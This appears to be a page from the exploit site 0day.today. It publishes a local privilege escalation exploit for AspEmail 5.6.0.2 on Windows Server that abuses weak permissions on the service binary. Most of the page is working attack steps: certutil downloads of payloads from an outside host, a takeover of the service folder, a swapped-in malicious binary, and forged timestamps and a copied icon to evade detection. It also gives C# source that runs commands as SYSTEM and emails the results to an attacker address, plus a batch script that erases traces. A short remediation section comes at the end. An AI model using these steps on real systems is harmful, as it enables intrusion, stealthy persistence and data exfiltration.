0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AspEmail 5.6.0.2 Weak Permissions / Local Privilege Escalation Vulnerability
#################################################################################################################### # Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation # # Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] # # Date: 13/04/2023 # # Exploit Author: Zer0FauLT [admindeepsec@proton.me] # # Vendor Homepage: https://www.aspemail.com # # Software Link: https://www.aspemail.com/download.html # # Product: AspEmail # # Version: AspEmail 5.6.0.2 and all # # Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU # # Tested on: Windows Server 2016 and Windows Server 2019 # # CVE : 0DAY # #################################################################################################################### # ================================================================================================================== [+] C:\PenTest>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled # ================================================================================================================== * First, we will test whether the AspEmail service is active. * First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running: [+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe EmailAgent.exe 4400 Persits Software EmailAgent or [+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe EmailAgent64.exe 4400 Persits Software EmailAgent * We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". * Now we know that AspEmail service is active. # ================================================================================================================== * We will need these: [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1" # ================================================================================================================== [+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" Name: Persits Software EmailAgent ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email Agent.exe" /run User : LocalSystem ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN IdentityReference : Everyone Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, ReadExtendedAttributes, DeleteChild, Execute/Traverse Status : Unknown UserCanStart : False UserCanStop : False [+] C:\PenTest>del PrivescCheck.ps1 * We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks. # ================================================================================================================== # [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail" Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail: Access is denied. * We do not have permission to access subdirectories. # ================================================================================================================== [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F) DeepSecLab\psacln:(I)(OI)(CI)(N) DeepSecLab\psaadm:(I)(OI)(CI)(N) DeepSecLab\psaadm_users:(I)(OI)(CI)(N) BUILTIN\Administrators:(I)(F) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX) NT SERVICE\TrustedInstaller:(I)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(OI)(CI)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX) * Unlike other directories, we have full privileges in the "BIN" directory of the service. * This is chmod 0777 - rwxrwxrwx in linux language. # ================================================================================================================== [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID __PATH \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16 [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators * We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user. # ================================================================================================================== * Now we will take ownership of this directory as we will execute our operations under the "BIN" directory. [+] C:\PenTest>whoami DeepSecLab\Hacker [+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN" SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker". [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN Successfully processed 1 files; Failed processing 0 files * Ok. All commands resulted successfully. We now have full privileges for this directory. # ================================================================================================================== * Now we will modify the EmailAgent file and inject a self-written malware. * We will be careful not to damage any files while doing this so that all transactions can be easily undone. [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe # ================================================================================================================== [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin 14.04.2023 16:47 <DIR> . 14.04.2023 16:47 <DIR> .. 01.03.2004 15:55 143.360 AspEmail.dll 25.02.2004 16:23 188.416 AspUpload.dll 13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe 24.09.2003 09:22 139.264 EmailAgentCfg.cpl 24.09.2003 09:25 94.208 EmailLogger.dll 24.09.2003 09:21 167.936 Null.EmailAgent.exe 6 File(s) 745.472 bytes 2 Dir(s) 165.936.717.824 bytes free # ================================================================================================================== * We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date. [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28" [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe * And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect. * I used the Resource Tuner Console tool. >>> http://www.restuner.com/tour-resource-tuner-console.htm * This can be done easily with the Resource Tuner tool. >>> http://www.resource-editor.com/how-to-change-icons-in-exe.html >>> http://www.restuner.com/download.htm # ================================================================================================================== [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin 14.04.2023 16:47 <DIR> . 14.04.2023 16:47 <DIR> .. 01.03.2004 15:55 143.360 AspEmail.dll 25.02.2004 16:23 188.416 AspUpload.dll 24.09.2003 09:21 12.288 EmailAgent.exe 24.09.2003 09:22 139.264 EmailAgentCfg.cpl 24.09.2003 09:25 94.208 EmailLogger.dll 24.09.2003 09:21 167.936 Null.EmailAgent.exe 6 File(s) 745.472 bytes 2 Dir(s) 165.936.717.824 bytes free [24.09.2003 09:21] 12.288 EmailAgent.exe [24.09.2003 09:21] 167.936 Null.EmailAgent.exe * And time manipulation is over. They look like they were uploaded at the same time long ago. # ================================================================================================================== * Now we check for my malware ownership. [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID __PATH \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28 [+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name Name DeepSecLab\Hacker EmailAgent.exe Owner: DeepSecLab\Hacker # =================================================================================================================# # # #################################################################################################################### # #[EmailAgent.cs]# # #################################################################################################################### # # # * We program this malware in such a way that when the server is reboot(when the services are restarted), # * It will be triggered and execute the codes we want, # * And then send a printout of all this to the email address we specified. # # using System; # using System.Linq; # using System.Text; # using System.Diagnostics; # using System.IO; # using System.Collections; # # Namespace CliToolSpace # { # class _Main # { # static void Main(string[] args) # { # Cli commandLine = new Cli(); # commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); # commandLine.Execute(); # commandLine.ToFile(@"C:\Windows\Temp\"); # } # } # } # # # # #################################################################################################################### # #[Mail.cs]# # #################################################################################################################### # # # using System; # using System.Net.Mail; # using System.Net; # SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); # var mail = new MailMessage(); # mail.From = new MailAddress("mail@deepseclab.com"); # mail.To.Add("mail@hacker.com"); # mail.Subject = "Trigger Successful!"; # mail.IsBodyHtml = true; # string htmlBody; # htmlBody = "<strong>This server has been rebooted.</strong>"; # mail.Body = htmlBody; # Attachment attachment; # attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); # mail.Attachments.Add(attachment); # SmtpServer.Port = 587; # SmtpServer.UseDefaultCredentials = false; # SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); # SmtpServer.EnableSsl = true; # SmtpServer.Timeout = int.MaxValue; # SmtpServer.Send(mail); # # # # #################################################################################################################### # #[Run.bat]# # #################################################################################################################### # # # whoami > C:\Windows\Temp\Export.txt # cd C:\Program Files (x86)\Persits Software\AspEmail\Bin # del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe # cd c:\Windows\Tasks # del Run.bat & del Mail.exe # # # # #################################################################################################################### # # [+]Trigger Successful![+] # # [+] C:\PenTest>systeminfo | findstr "Boot Time" # System Boot Time: 13.04.2022, 07:46:06 # # # # #################################################################################################################### #[Export.txt]# # #################################################################################################################### # # # NT AUTHORITY\SYSTEM # # # # #################################################################################################################### # # # ================================================================================================================== # ...|||[FIX]|||... # # ================================================================================================================== # [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] # # =================================================================================================================# [+] C:\Administrator>sc qc "Persits Software EmailAgent" [SC] QueryServiceConfig SUCCESS SERVICE_Name: Persits Software EmailAgent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run LOAD_ORDER_GROUP : TAG : 0 DISPLAY_Name : Persits Software EmailAgent DEPENDENCIES : rpcss SERVICE_START_Name : LocalSystem # ================================================================================================================== [+] C:\Administrator>sc sdshow "Persits Software EmailAgent" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) # ================================================================================================================== [+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula Accesschk v6.15 - Reports effective permissions for securable objects Copyright (C) 2006-2022 Mark Russinovich Sysinternals - www.sysinternals.com Persits Software EmailAgent Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS # ================================================================================================================== [+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied. DONE! # ================================================================================================================== [+] C:\Administrator>sc stop "Persits Software EmailAgent" [+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent" * These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore. # ================================================================================================================== # 0day.today [2024-09-28] #